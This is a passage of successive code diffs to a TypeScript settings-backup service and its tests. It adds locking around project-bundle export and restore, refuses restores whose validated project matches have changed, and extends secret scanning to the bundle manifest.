+   * Every user project becomes an entry, including zero-memory ones: the project list is
+   * half the feature. `memoryDir` records this install's actual directory name, which is
+   * also what restore-side matching recomputes. Listed from the registry as it is now —
+   * the caller holds the registration lock — so the bundle names exactly the projects
+   * registered when it is written, not the ones registered when the (long) remote
+   * discovery began; a project added since carries no remote hint, one removed since is
+   * gone along with its memory.
+   */
+  function listProjectBundleEntries(
+    remotes: ReadonlyMap<string, string | undefined>
+  ): BackupProjectBundleEntry[] {
+    const projects = userProjects();
+    if (projects.length > MAX_BACKUP_PROJECT_ENTRIES) {
+      throw new Error(`Backup has more than ${MAX_BACKUP_PROJECT_ENTRIES} projects`);
+    }
+    return projects.map(([projectPath, projectConfig]) => {
+      const gitRemote = remotes.get(projectPath);
+      return {
+        path: projectPath,
+        // Clamped to the manifest schema's cap so a long custom title cannot produce a
+        // bundle this build's own restore would refuse.
+        name: getProjectDisplayName(projectPath, projectConfig).slice(0, 256),
+        ...(gitRemote !== undefined ? { gitRemote } : {}),
+        memoryDir: projectMemoryDirName(projectPath),
+      };
+    });
   }
 
   function registeredProjectDirs(): Map<string, string> {
@@ -400,20 +423,28 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       // fresh after the core payload.
       let scanFiles = payload.files;
       if (exportOptions.includeProjects) {
-        const entries = await listProjectBundleEntries();
-        // Collected under the memory lock so an agent writing memory mid-export cannot
+        const remotes = await discoverProjectRemotes();
+        // The project list is read, the memory collected, and the bundle written under the
+        // registration lock (taken before the memory lock, the fixed order), so a project
+        // registered or removed during the seconds of remote discovery above is reflected
+        // and none can change between the listing and the bundle that publishes it. Memory
+        // is collected under the memory lock so an agent writing memory mid-export cannot
         // produce a torn bundle or trip the collector's identity checks.
-        const bundle = await withMemoryLock(() =>
-          collectProjectBundle(
-            muxRoot,
-            entries,
-            // Restore refuses files past the memory subsystem's read limit, so exporting
-            // them would only produce a backup no build can bring back.
-            { portableMemoryOnly: true }
-          )
-        );
-        await writeProjectBundle(path.join(destination, PROJECT_BUNDLE_DIR), bundle, {
-          ownerOnly: true,
+        const bundle = await withProjectRegistrationLock(muxRoot, async () => {
+          const entries = listProjectBundleEntries(remotes);
+          const collected = await withMemoryLock(() =>
+            collectProjectBundle(
+              muxRoot,
+              entries,
+              // Restore refuses files past the memory subsystem's read limit, so exporting
+              // them would only produce a backup no build can bring back.
+              { portableMemoryOnly: true }
+            )
+          );
+          await writeProjectBundle(path.join(destination, PROJECT_BUNDLE_DIR), collected, {
+            ownerOnly: true,
+          });
+          return collected;
         });
         // Core and bundle were budgeted separately; the next checkout will bound them as
         // one tree, so refuse here what it would refuse there.

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -68,6 +68,7 @@ import {
   writeBackupPayload,
   type BackupFile,
   type BackupProjectBundle,
+  type MatchedProjectEntry,
   type ProjectBundleRestorePlan,
 } from "./payload";
 
@@ -653,11 +654,14 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       } else {
         // Only entries the caller validated as matched, to the very same destination. A
         // project registered at its recorded path since validation was previewed as an
-        // import and is not covered by the snapshot, so it must not be overwritten here;
-        // one unregistered since validation drops out of the recomputed plan on its own.
+        // import and is not covered by the snapshot, so it must not be overwritten here.
+        const matchKey = (sourcePath: string, projectPath: string, localMemoryDir: string) =>
+          `${sourcePath}\0${projectPath}\0${localMemoryDir}`;
+        const planKey = (match: MatchedProjectEntry) =>
+          matchKey(match.entry.path, match.projectPath, match.localMemoryDir);
         const validatedMatched = new Set(
-          restoreOptions.matchedProjects.map(
-            (match) => `${match.sourcePath}\0${match.projectPath}\0${match.localMemoryDir}`
+          restoreOptions.matchedProjects.map((match) =>
+            matchKey(match.sourcePath, match.projectPath, match.localMemoryDir)
           )
         );
         // One lock window from the memory preflight through the matched write, entered
@@ -674,10 +678,25 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
           const registered = registeredProjectDirs();
           const matched = bundlePlan.plan.matched.filter(
             (match) =>
-              validatedMatched.has(
-                `${match.entry.path}\0${match.projectPath}\0${match.localMemoryDir}`
-              ) && registered.get(match.projectPath) === match.localMemoryDir
+              validatedMatched.has(planKey(match)) &&
+              registered.get(match.projectPath) === match.localMemoryDir
           );
+          // A validated match that no longer writes — its project unregistered since, or
+          // resolved to a different local project now — is refused rather than dropped:
+          // the caller reports unapproved candidates from its validation, so a silently
+          // omitted entry would leave a "completed" restore with that project's memory
+          // neither written nor offered. Nothing has changed yet; a new preview re-offers it.
+          const stillMatched = new Set(matched.map(planKey));
+          const dropped = restoreOptions.matchedProjects.find(
+            (match) =>
+              !stillMatched.has(matchKey(match.sourcePath, match.projectPath, match.localMemoryDir))
+          );
+          if (dropped !== undefined) {
+            throw new BackupServiceError(
+              "IO_ERROR",
+              `Cannot restore: the project registration for '${dropped.projectPath}' changed since the restore was validated; preview again to continue`
+            );
+          }
           if (matched.length > 0) {
             for (const match of matched) {
               await assertProjectMemoryWritesAllowed(muxRoot, matchedProjectWrites(match));

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -30,10 +30,13 @@ import { BACKUP_GIT_TIMEOUT_MS } from "@/constants/terminationTimeouts";
 import { BackupRepoCache } from "./gitRepo";
 import {
   PROJECT_BUNDLE_DIR,
+  PROJECT_BUNDLE_MANIFEST_PATH,
   ProjectMemoryRestoreError,
   ProjectMemoryWriteError,
+  assertManagedTreeWithinLimits,
   backupPayloadExists,
   bundleEntryFiles,
+  serializeProjectBundleManifest,
   collectProjectBundle,
   planProjectBundleRestore,
   projectBundleExists,
@@ -390,9 +393,21 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
         await writeProjectBundle(path.join(destination, PROJECT_BUNDLE_DIR), bundle, {
           ownerOnly: true,
         });
-        // One scan and one digest over core and bundle files together, so the secret gate
-        // and its approval bind the exact combined payload a push would publish.
-        scanFiles = [...payload.files, ...bundle.files];
+        // Core and bundle were budgeted separately; the next checkout will bound them as
+        // one tree, so refuse here what it would refuse there.
+        await assertManagedTreeWithinLimits(destination);
+        // One scan and one digest over everything the push would publish: core files,
+        // bundle files, and the bundle manifest itself — project paths, names, and remotes
+        // are published text too, and a token in a remote's path survives the URL
+        // credential sanitizer.
+        scanFiles = [
+          ...payload.files,
+          ...bundle.files,
+          {
+            path: PROJECT_BUNDLE_MANIFEST_PATH,
+            content: serializeProjectBundleManifest(bundle.manifest),
+          },
+        ];
       }
       const secretFiles = scanBackupFilesForSecrets(scanFiles);
       return {

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -537,6 +537,14 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       for (const match of bundlePlan.plan.matched) {
         await assertProjectMemoryWritesAllowed(muxRoot, match.files);
       }
+      // So does the recovery copy: a destination that cannot be snapshotted (a local file
+      // past the backup budgets) refuses the restore here, not after the core writes. The
+      // restore takes the real snapshot again inside its lock window.
+      if (bundlePlan.plan.matched.length > 0) {
+        await withMemoryLock(() =>
+          collectOverwritableProjectMemory(muxRoot, bundlePlan.plan.matched)
+        );
+      }
       return {
         hasProjectBundle: true,
         projectImports: toProjectImports(bundlePlan.plan),

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -601,36 +601,130 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
       const sourceDir = await managedDir(restoreOptions.repositoryRoot, restoreOptions.managedPath);
       const payload = await readBackupPayload(sourceDir);
       const before = await localFilesByPath();
-      const result = await restoreBackupPayload({
-        muxRoot,
-        payload,
-        approvedCommandTokens: restoreOptions.approvedCommandTokens,
-      });
-      if (result.backupPreferences !== undefined) {
-        let merged: ReturnType<typeof normalizeUserPreferences> | undefined;
-        await options.config.editConfig((current) => {
-          // Merged against the config this edit reads, not a snapshot taken before the
-          // restore: a whole-object write would otherwise discard preferences another
-          // window saved meanwhile, including the machine-local keys no backup carries.
-          merged = normalizeUserPreferences(
-            mergeBackupPreferences(current.userPreferences, result.backupPreferences)
-          );
-          return { ...current, userPreferences: merged };
+
+      const restoreCore = async (): Promise<{ localOnlyFiles: string[] }> => {
+        const result = await restoreBackupPayload({
+          muxRoot,
+          payload,
+          approvedCommandTokens: restoreOptions.approvedCommandTokens,
         });
-        // saveConfig logs and swallows write failures, so a resolved edit does not prove
-        // the preferences landed. Compared through the backup projection because every
-        // key a restore can change is portable, so a lost write is visible there, while
-        // machine-local keys the load path normalizes differently stay out of the check.
-        const stored = options.config.loadConfigOrDefault().userPreferences;
-        if (
-          merged !== undefined &&
-          !serializeBackupPreferences(stored ?? {}).equals(serializeBackupPreferences(merged))
-        ) {
-          throw new BackupServiceError(
-            "IO_ERROR",
-            "The restored preferences could not be written to config.json"
-          );
+        if (result.backupPreferences !== undefined) {
+          let merged: ReturnType<typeof normalizeUserPreferences> | undefined;
+          await options.config.editConfig((current) => {
+            // Merged against the config this edit reads, not a snapshot taken before the
+            // restore: a whole-object write would otherwise discard preferences another
+            // window saved meanwhile, including the machine-local keys no backup carries.
+            merged = normalizeUserPreferences(
+              mergeBackupPreferences(current.userPreferences, result.backupPreferences)
+            );
+            return { ...current, userPreferences: merged };
+          });
+          // saveConfig logs and swallows write failures, so a resolved edit does not prove
+          // the preferences landed. Compared through the backup projection because every
+          // key a restore can change is portable, so a lost write is visible there, while
+          // machine-local keys the load path normalizes differently stay out of the check.
+          const stored = options.config.loadConfigOrDefault().userPreferences;
+          if (
+            merged !== undefined &&
+            !serializeBackupPreferences(stored ?? {}).equals(serializeBackupPreferences(merged))
+          ) {
+            throw new BackupServiceError(
+              "IO_ERROR",
+              "The restored preferences could not be written to config.json"
+            );
+          }
         }
+        return { localOnlyFiles: result.localOnlyFiles };
+      };
+
+      let projectBundleSkipped = false;
+      const restoredProjectMemory: Array<{ projectPath: string; files: string[] }> = [];
+      const memoryChanges: string[] = [];
+      let core: { localOnlyFiles: string[] };
+      const bundlePlan = restoreOptions.includeProjects
+        ? await readBundleWithPlan(sourceDir)
+        : null;
+      if (bundlePlan === null) {
+        // Existence-only, like the preview: a malformed sidecar must never block a
+        // core-only restore, but its presence is reported so the skip is visible.
+        projectBundleSkipped =
+          !restoreOptions.includeProjects && (await projectBundleExists(sourceDir));
+        core = await restoreCore();
+      } else {
+        // Only entries the caller validated as matched, to the very same destination. A
+        // project registered at its recorded path since validation was previewed as an
+        // import and is not covered by the snapshot, so it must not be overwritten here;
+        // one unregistered since validation drops out of the recomputed plan on its own.
+        const validatedMatched = new Set(
+          restoreOptions.matchedProjects.map(
+            (match) => `${match.sourcePath}\0${match.projectPath}\0${match.localMemoryDir}`
+          )
+        );
+        // One lock window from the memory preflight through the matched write, entered
+        // before the core settings change: an in-app memory edit between the caller's
+        // preflight and this point can no longer turn a still-valid plan into a failure
+        // discovered only after the core files were already overwritten, and nothing can
+        // edit a file between its snapshot bytes and its overwrite.
+        core = await withMemoryLock(async () => {
+          // Registration is re-read at the write boundary so a project unregistered since
+          // the plan was computed is left alone. Project registration is not serialized
+          // with memory writes (config edits take no memory lock), so this is the
+          // narrowest check available, not a guarantee against a concurrent edit landing
+          // between this read and the write.
+          const registered = registeredProjectDirs();
+          const matched = bundlePlan.plan.matched.filter(
+            (match) =>
+              validatedMatched.has(
+                `${match.entry.path}\0${match.projectPath}\0${match.localMemoryDir}`
+              ) && registered.get(match.projectPath) === match.localMemoryDir
+          );
+          if (matched.length > 0) {
+            for (const match of matched) {
+              await assertProjectMemoryWritesAllowed(muxRoot, matchedProjectWrites(match));
+            }
+            // Exactly the files these writes can overwrite: not whole project directories,
+            // whose unrelated local-only notes neither need covering nor may fail the
+            // restore, and never other registered projects.
+            const localBundle = await collectOverwritableProjectMemory(muxRoot, matched);
+            await writeProjectBundle(
+              path.join(restoreOptions.snapshotPath, PROJECT_BUNDLE_DIR),
+              localBundle,
+              { portable: false, ownerOnly: true }
+            );
+          }
+          const coreResult = await restoreCore();
+          // Matched entries restore verbatim, exactly what the preview promised. Imports
+          // are executed separately by the service, after project registration.
+          for (const match of matched) {
+            let written: string[];
+            try {
+              written = (
+                await writeProjectMemoryFiles(muxRoot, matchedProjectWrites(match), {
+                  addOnly: false,
+                })
+              ).written;
+            } catch (error) {
+              // Files written so far — earlier entries and this one's partial progress —
+              // are on disk; the failure must still announce them.
+              if (error instanceof ProjectMemoryWriteError && error.written.length > 0) {
+                restoredProjectMemory.push({
+                  projectPath: match.projectPath,
+                  files: error.written,
+                });
+              }
+              throw new ProjectMemoryRestoreError(
+                error instanceof Error ? error.message : String(error),
+                restoredProjectMemory,
+                { cause: error }
+              );
+            }
+            if (written.length > 0) {
+              memoryChanges.push(...written);
+              restoredProjectMemory.push({ projectPath: match.projectPath, files: written });
+            }
+          }
+          return coreResult;
+        });
       }
 
       const after = await localFilesByPath();
@@ -640,87 +734,9 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
           return !previous?.content.equals(current.content) || !sameMode(previous, current);
         })
         .map(([file]) => file);
-
-      let projectBundleSkipped = false;
-      const restoredProjectMemory: Array<{ projectPath: string; files: string[] }> = [];
-      if (!restoreOptions.includeProjects) {
-        // Existence-only, like the preview: a malformed sidecar must never block a
-        // core-only restore, but its presence is reported so the skip is visible.
-        projectBundleSkipped = await projectBundleExists(sourceDir);
-      } else {
-        const bundlePlan = await readBundleWithPlan(sourceDir);
-        if (bundlePlan !== null) {
-          // Only entries the caller validated as matched. A project registered at its
-          // recorded path since validation was previewed as an import and is not covered
-          // by the snapshot, so it must not be overwritten here; one unregistered since
-          // validation drops out of the recomputed plan on its own.
-          const validatedMatched = new Set(
-            restoreOptions.matchedProjects.map(
-              (match) => `${match.sourcePath}\0${match.projectPath}\0${match.localMemoryDir}`
-            )
-          );
-          // One lock window for the snapshot and the overwrite: a memory edit landing
-          // between them would otherwise be destroyed with a snapshot that predates it.
-          await withMemoryLock(async () => {
-            // Registration is re-read at the write boundary so a project unregistered since
-            // the plan was computed is left alone. Project registration is not serialized
-            // with memory writes (config edits take no memory lock), so this is the
-            // narrowest check available, not a guarantee against a concurrent edit landing
-            // between this read and the write.
-            const registered = registeredProjectDirs();
-            const matched = bundlePlan.plan.matched.filter(
-              (match) =>
-                validatedMatched.has(
-                  `${match.entry.path}\0${match.projectPath}\0${match.localMemoryDir}`
-                ) && registered.get(match.projectPath) === match.localMemoryDir
-            );
-            if (matched.length > 0) {
-              // Exactly the files these writes can overwrite: not whole project directories,
-              // whose unrelated local-only notes neither need covering nor may fail the
-              // restore, and never other registered projects.
-              const localBundle = await collectOverwritableProjectMemory(muxRoot, matched);
-              await writeProjectBundle(
-                path.join(restoreOptions.snapshotPath, PROJECT_BUNDLE_DIR),
-                localBundle,
-                { portable: false, ownerOnly: true }
-              );
-            }
-            // Matched entries restore verbatim, exactly what the preview promised. Imports
-            // are executed separately by the service, after project registration.
-            for (const match of matched) {
-              let written: string[];
-              try {
-                written = (
-                  await writeProjectMemoryFiles(muxRoot, matchedProjectWrites(match), {
-                    addOnly: false,
-                  })
-                ).written;
-              } catch (error) {
-                // Files written so far — earlier entries and this one's partial progress —
-                // are on disk; the failure must still announce them.
-                if (error instanceof ProjectMemoryWriteError && error.written.length > 0) {
-                  restoredProjectMemory.push({
-                    projectPath: match.projectPath,
-                    files: error.written,
-                  });
-                }
-                throw new ProjectMemoryRestoreError(
-                  error instanceof Error ? error.message : String(error),
-                  restoredProjectMemory,
-                  { cause: error }
-                );
-              }
-              if (written.length > 0) {
-                changedFiles.push(...written);
-                restoredProjectMemory.push({ projectPath: match.projectPath, files: written });
-              }
-            }
-          });
-        }
-      }
       return {
-        changedFiles: changedFiles.sort(),
-        localOnlyFiles: result.localOnlyFiles,
+        changedFiles: [...changedFiles, ...memoryChanges].sort(),
+        localOnlyFiles: core.localOnlyFiles,
         projectBundleSkipped,
         restoredProjectMemory,
       };

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -766,7 +766,16 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
             // From now on this project is the local identity of the recorded source: later
             // restores match it and can update its memory instead of re-offering an
             // add-only import that can never change an existing file.
-            await writeProjectMemoryOrigin(muxRoot, targetDir, entry.path);
+            try {
+              await writeProjectMemoryOrigin(muxRoot, targetDir, entry.path);
+            } catch (error) {
+              // The memory files are already on disk; the failure must keep reporting them.
+              throw new ProjectMemoryWriteError(
+                error instanceof Error ? error.message : String(error),
+                result,
+                { cause: error }
+              );
+            }
             return result;
           });
           return { writtenFiles: written, skippedFiles: skipped };

--- a/src/node/services/backup/adapters.ts
+++ b/src/node/services/backup/adapters.ts
@@ -17,6 +17,7 @@ import { getProjectDisplayName } from "@/common/utils/subProjects";
 import { projectMemoryDirName } from "@/node/services/memoryService";
 import {
   memoryMutationLockKey,
+  withProjectRegistrationLock,
   withTargetMutationLock,
 } from "@/node/services/refinement/targetMutationLocks";
 import { execFileAsync } from "@/node/utils/disposableExec";
@@ -670,86 +671,92 @@ export function createBackupPayloadStore(options: { config: Config }): BackupPay
         // before the core settings change: an in-app memory edit between the caller's
         // preflight and this point can no longer turn a still-valid plan into a failure
         // discovered only after the core files were already overwritten, and nothing can
-        // edit a file between its snapshot bytes and its overwrite.
-        core = await withMemoryLock(async () => {
-          // The plan is recomputed at the write boundary, from registration and the origin
-          // markers as they are now. Origin markers are written under this same lock (by an
-          // import), so a project re-pointed at another source since validation no longer
-          // matches the old entry here. Project registration is not serialized with memory
-          // writes (config edits take no memory lock), so for it this is the narrowest check
-          // available, not a guarantee against a concurrent edit landing before the write.
-          const registered = registeredProjectDirs();
-          const plan = planProjectBundleRestore(
-            bundle,
-            registered,
-            await readProjectMemoryOrigins(muxRoot, registered)
-          );
-          const matched = plan.matched.filter((match) => validatedMatched.has(planKey(match)));
-          // A validated match that no longer writes — its project unregistered since, or
-          // resolved to a different local project now — is refused rather than dropped:
-          // the caller reports unapproved candidates from its validation, so a silently
-          // omitted entry would leave a "completed" restore with that project's memory
-          // neither written nor offered. Nothing has changed yet; a new preview re-offers it.
-          const stillMatched = new Set(matched.map(planKey));
-          const dropped = restoreOptions.matchedProjects.find(
-            (match) =>
-              !stillMatched.has(matchKey(match.sourcePath, match.projectPath, match.localMemoryDir))
-          );
-          if (dropped !== undefined) {
-            throw new BackupServiceError(
-              "IO_ERROR",
-              `Cannot restore: the project registration for '${dropped.projectPath}' changed since the restore was validated; preview again to continue`
+        // edit a file between its snapshot bytes and its overwrite. The registration lock
+        // is taken first (the fixed order; `ProjectService.remove` takes only it) and holds
+        // project unregistration off for the same window, so the registration read below
+        // stays true until the matched memory has landed.
+        core = await withProjectRegistrationLock(muxRoot, () =>
+          withMemoryLock(async () => {
+            // The plan is recomputed at the write boundary, from registration and the origin
+            // markers as they are now: origin markers are written under the memory lock (by
+            // an import) and registration cannot change under the registration lock, so a
+            // project re-pointed at another source or unregistered since validation no
+            // longer matches the old entry here, and what matches here is what gets written.
+            const registered = registeredProjectDirs();
+            const plan = planProjectBundleRestore(
+              bundle,
+              registered,
+              await readProjectMemoryOrigins(muxRoot, registered)
             );
-          }
-          if (matched.length > 0) {
-            for (const match of matched) {
-              await assertProjectMemoryWritesAllowed(muxRoot, matchedProjectWrites(match), {
-                addOnly: false,
-              });
-            }
-            // Exactly the files these writes can overwrite: not whole project directories,
-            // whose unrelated local-only notes neither need covering nor may fail the
-            // restore, and never other registered projects.
-            const localBundle = await collectOverwritableProjectMemory(muxRoot, matched);
-            await writeProjectBundle(
-              path.join(restoreOptions.snapshotPath, PROJECT_BUNDLE_DIR),
-              localBundle,
-              { portable: false, ownerOnly: true }
+            const matched = plan.matched.filter((match) => validatedMatched.has(planKey(match)));
+            // A validated match that no longer writes — its project unregistered since, or
+            // resolved to a different local project now — is refused rather than dropped:
+            // the caller reports unapproved candidates from its validation, so a silently
+            // omitted entry would leave a "completed" restore with that project's memory
+            // neither written nor offered. Nothing has changed yet; a new preview re-offers it.
+            const stillMatched = new Set(matched.map(planKey));
+            const dropped = restoreOptions.matchedProjects.find(
+              (match) =>
+                !stillMatched.has(
+                  matchKey(match.sourcePath, match.projectPath, match.localMemoryDir)
+                )
             );
-          }
-          const coreResult = await restoreCore();
-          // Matched entries restore verbatim, exactly what the preview promised. Imports
-          // are executed separately by the service, after project registration.
-          for (const match of matched) {
-            let written: string[];
-            try {
-              written = (
-                await writeProjectMemoryFiles(muxRoot, matchedProjectWrites(match), {
-                  addOnly: false,
-                })
-              ).written;
-            } catch (error) {
-              // Files written so far — earlier entries and this one's partial progress —
-              // are on disk; the failure must still announce them.
-              if (error instanceof ProjectMemoryWriteError && error.written.length > 0) {
-                restoredProjectMemory.push({
-                  projectPath: match.projectPath,
-                  files: error.written,
-                });
-              }
-              throw new ProjectMemoryRestoreError(
-                error instanceof Error ? error.message : String(error),
-                restoredProjectMemory,
-                { cause: error }
+            if (dropped !== undefined) {
+              throw new BackupServiceError(
+                "IO_ERROR",
+                `Cannot restore: the project registration for '${dropped.projectPath}' changed since the restore was validated; preview again to continue`
               );
             }
-            if (written.length > 0) {
-              memoryChanges.push(...written);
-              restoredProjectMemory.push({ projectPath: match.projectPath, files: written });
+            if (matched.length > 0) {
+              for (const match of matched) {
+                await assertProjectMemoryWritesAllowed(muxRoot, matchedProjectWrites(match), {
+                  addOnly: false,
+                });
+              }
+              // Exactly the files these writes can overwrite: not whole project directories,
+              // whose unrelated local-only notes neither need covering nor may fail the
+              // restore, and never other registered projects.
+              const localBundle = await collectOverwritableProjectMemory(muxRoot, matched);
+              await writeProjectBundle(
+                path.join(restoreOptions.snapshotPath, PROJECT_BUNDLE_DIR),
+                localBundle,
+                { portable: false, ownerOnly: true }
+              );
             }
-          }
-          return coreResult;
-        });
+            const coreResult = await restoreCore();
+            // Matched entries restore verbatim, exactly what the preview promised. Imports
+            // are executed separately by the service, after project registration.
+            for (const match of matched) {
+              let written: string[];
+              try {
+                written = (
+                  await writeProjectMemoryFiles(muxRoot, matchedProjectWrites(match), {
+                    addOnly: false,
+                  })
+                ).written;
+              } catch (error) {
+                // Files written so far — earlier entries and this one's partial progress —
+                // are on disk; the failure must still announce them.
+                if (error instanceof ProjectMemoryWriteError && error.written.length > 0) {
+                  restoredProjectMemory.push({
+                    projectPath: match.projectPath,
+                    files: error.written,
+                  });
+                }
+                throw new ProjectMemoryRestoreError(
+                  error instanceof Error ? error.message : String(error),
+                  restoredProjectMemory,
+                  { cause: error }
+                );
+              }
+              if (written.length > 0) {
+                memoryChanges.push(...written);
+                restoredProjectMemory.push({ projectPath: match.projectPath, files: written });
+              }
+            }
+            return coreResult;
+          })
+        );
       }
 
       const after = await localFilesByPath();

--- a/src/node/services/backup/backupService.integration.test.ts
+++ b/src/node/services/backup/backupService.integration.test.ts
@@ -8,6 +8,8 @@ import { createBackupGitRepo, createBackupPayloadStore } from "./adapters";
 import { backupCachePath } from "./gitRepo";
 import { BackupService } from "./backupService";
 import { REDACTED_BACKUP_VALUE } from "./payload";
+import { ProjectService } from "@/node/services/projectService";
+import { projectMemoryDirName } from "@/node/services/memoryService";
 import { runGit, writeFixtureFile } from "./testHelpers";
 
 const SECRET_FILES = [
@@ -427,5 +429,61 @@ describe("BackupService against a real repository", () => {
     const missing = { ...settings, repoUrl: path.join(tempDir, "does-not-exist.git") };
     const validated = await service.validate(missing);
     expect(validated.success).toBe(false);
+  });
+
+  it("round-trips the project bundle and reimports a project at a different path", async () => {
+    // Source machine: one registered project with memory.
+    const projectPath = path.join(tempDir, "projects", "rocket");
+    await fs.mkdir(projectPath, { recursive: true });
+    const projectService = new ProjectService(config);
+    const created = await projectService.create(projectPath);
+    if (!created.success) throw new Error(created.error);
+    const sourceDir = projectMemoryDirName(created.data.normalizedPath);
+    await writeFixtureFile(muxRoot, `memory/project/${sourceDir}/notes.md`, "rocket memory\n");
+
+    const withProjects = { ...settings, includeProjects: true };
+    const pushed = await service.push(withProjects);
+    expect(pushed.success).toBe(true);
+
+    const clone = await cloneOrigin("bundle-verify");
+    const files = await listFiles(clone);
+    expect(files).toContain("mux/project-bundle/manifest.json");
+    expect(files).toContain(`mux/project-bundle/memory/project/${sourceDir}/notes.md`);
+    // The core manifest stays bundle-free so an old build's reader ignores the sidecar.
+    const coreManifest = await fs.readFile(path.join(clone, "mux", "manifest.json"), "utf-8");
+    expect(coreManifest).not.toContain("project-bundle");
+
+    // Target machine: a fresh Xum root restoring from the same repository.
+    const otherRoot = path.join(tempDir, "other-root");
+    await fs.mkdir(otherRoot, { recursive: true });
+    const otherConfig = new Config(otherRoot);
+    const otherService = new BackupService(otherConfig, {
+      gitRepo: createBackupGitRepo({ cacheRoot: path.join(otherRoot, "backup-cache") }),
+      payload: createBackupPayloadStore({ config: otherConfig }),
+    });
+    otherService.setProjectService(new ProjectService(otherConfig));
+
+    const preview = await otherService.preview(withProjects);
+    expect(preview.success).toBe(true);
+    if (!preview.success) throw new Error(preview.error.message);
+    expect(preview.data.projectImports).toHaveLength(1);
+    const candidate = preview.data.projectImports[0];
+    expect(candidate.sourcePath).toBe(created.data.normalizedPath);
+
+    const movedPath = path.join(tempDir, "projects", "rocket-moved");
+    await fs.mkdir(movedPath, { recursive: true });
+    const restored = await otherService.restore(withProjects, {
+      projectImports: [{ token: candidate.token, targetPath: movedPath }],
+    });
+    expect(restored.success).toBe(true);
+    if (!restored.success) throw new Error(restored.error.message);
+    expect(restored.data.projectImportResults[0]?.status).toBe("imported");
+
+    const rekeyedDir = projectMemoryDirName(path.resolve(movedPath));
+    expect(rekeyedDir).not.toBe(sourceDir);
+    expect(
+      await fs.readFile(path.join(otherRoot, "memory", "project", rekeyedDir, "notes.md"), "utf-8")
+    ).toBe("rocket memory\n");
+    expect(otherConfig.loadConfigOrDefault().projects.has(path.resolve(movedPath))).toBe(true);
   });
 });

--- a/src/node/services/backup/backupService.test.ts
+++ b/src/node/services/backup/backupService.test.ts
@@ -6,7 +6,7 @@ import type { BackupProjectImport, SettingsBackupInput } from "@/common/orpc/sch
 import { Err, Ok } from "@/common/types/result";
 import { BackupNonFastForwardError, backupCachePath, isBackupCacheName } from "./gitRepo";
 import { BackupRemoteUnreachableError } from "./credentials";
-import { BackupCommandApprovalRequiredError } from "./payload";
+import { BackupCommandApprovalRequiredError, ProjectMemoryWriteError } from "./payload";
 import {
   BackupService,
   BackupServiceError,
@@ -87,10 +87,16 @@ function createPayload(overrides: Partial<BackupPayloadStore> = {}): BackupPaylo
         projectImports: [],
         projectBundleSkipped: false,
       }),
-    validateRestore: () => Promise.resolve({ hasProjectBundle: false, projectImports: [] }),
+    validateRestore: () =>
+      Promise.resolve({ hasProjectBundle: false, projectImports: [], matchedProjectPaths: [] }),
     writeSafetySnapshot: () => Promise.resolve(),
     restore: () =>
-      Promise.resolve({ changedFiles: [], localOnlyFiles: [], projectBundleSkipped: false }),
+      Promise.resolve({
+        changedFiles: [],
+        localOnlyFiles: [],
+        projectBundleSkipped: false,
+        restoredProjectMemory: [],
+      }),
     importProjectMemory: () => Promise.resolve({ writtenFiles: [], skippedFiles: [] }),
     ...overrides,
   };
@@ -126,7 +132,11 @@ describe("BackupService", () => {
       payload: createPayload({
         validateRestore: () => {
           events.push("validate");
-          return Promise.resolve({ hasProjectBundle: false, projectImports: [] });
+          return Promise.resolve({
+            hasProjectBundle: false,
+            projectImports: [],
+            matchedProjectPaths: [],
+          });
         },
         writeSafetySnapshot: async (snapshotRoot) => {
           events.push("snapshot");
@@ -138,6 +148,7 @@ describe("BackupService", () => {
             changedFiles: ["AGENTS.md"],
             localOnlyFiles: ["skills/local/SKILL.md"],
             projectBundleSkipped: false,
+            restoredProjectMemory: [],
           });
         },
       }),
@@ -373,7 +384,12 @@ describe("BackupService", () => {
           restoreEntered?.();
           await restoreHeld;
           events.push("restore-end");
-          return { changedFiles: ["AGENTS.md"], localOnlyFiles: [], projectBundleSkipped: false };
+          return {
+            changedFiles: ["AGENTS.md"],
+            localOnlyFiles: [],
+            projectBundleSkipped: false,
+            restoredProjectMemory: [],
+          };
         },
         exportTo: () => {
           events.push("export");
@@ -530,7 +546,11 @@ describe("BackupService", () => {
         },
         validateRestore: (options) => {
           recordManagedPath(options);
-          return Promise.resolve({ hasProjectBundle: false, projectImports: [] });
+          return Promise.resolve({
+            hasProjectBundle: false,
+            projectImports: [],
+            matchedProjectPaths: [],
+          });
         },
         restore: (options) => {
           recordManagedPath(options);
@@ -538,6 +558,7 @@ describe("BackupService", () => {
             changedFiles: [],
             localOnlyFiles: [],
             projectBundleSkipped: false,
+            restoredProjectMemory: [],
           });
         },
       }),
@@ -981,7 +1002,11 @@ describe("BackupService", () => {
           const tokens = [...(approvedCommandTokens ?? [])];
           seenTokens.push(tokens);
           return tokens.includes("approved-token")
-            ? Promise.resolve({ hasProjectBundle: false, projectImports: [] })
+            ? Promise.resolve({
+                hasProjectBundle: false,
+                projectImports: [],
+                matchedProjectPaths: [],
+              })
             : Promise.reject(new BackupCommandApprovalRequiredError(approvals));
         },
       }),
@@ -1068,7 +1093,12 @@ describe("BackupService project imports", () => {
     let snapshots = 0;
     const service = createService(tempDir, {
       payload: createPayload({
-        validateRestore: () => Promise.resolve({ hasProjectBundle: true, projectImports: [fresh] }),
+        validateRestore: () =>
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [fresh],
+            matchedProjectPaths: [],
+          }),
         writeSafetySnapshot: () => {
           snapshots += 1;
           return Promise.resolve();
@@ -1095,7 +1125,11 @@ describe("BackupService project imports", () => {
     const service = createService(tempDir, {
       payload: createPayload({
         validateRestore: () =>
-          Promise.resolve({ hasProjectBundle: true, projectImports: [candidate()] }),
+          Promise.resolve({
+            hasProjectBundle: true,
+            projectImports: [candidate()],
+            matchedProjectPaths: [],
+          }),
